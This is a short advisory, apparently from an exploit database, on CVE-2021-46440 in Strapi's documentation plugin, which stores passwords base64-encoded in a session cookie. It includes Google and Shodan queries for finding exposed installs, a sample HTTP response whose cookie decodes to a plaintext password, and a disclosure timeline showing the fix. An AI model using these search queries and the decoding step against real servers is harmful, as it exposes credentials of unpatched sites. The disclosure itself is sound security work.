# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format  
# Google Dork: intitle:"Welcome to your Strapi ap"  
# Shodan search: "X-Powered-By: Strapi <>"  
# Date: 2022-03-30  
# Exploit Author: Kitchaphan Singchai [idealphase]  
# Vendor Homepage:  
# Software Link:  
# Vulnerable Version: < 3.6.9 and < 4.1.5  
# Version: 3.6.8  
# Tested on: Linux  
# CVE: CVE-2021-46440  
# Description:  
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.  
# This CVE has been fixed via this Github pull request.  
- Change documentation auth cookie system (  
# PoC:  
POST /documentation/login HTTP/1.1  
HTTP/1.1 302 Found  
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly  
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly  
X-Powered-By: Strapi <>  
Redirecting to <a href="/documentation">/documentation</a>.  
Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.  
# Timeline:  
19/Jan/2022 - Inform vulnerability to Strapi team  
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.  
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (  
28/Mar/2022 - Reserved CVE-2021-46440  
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]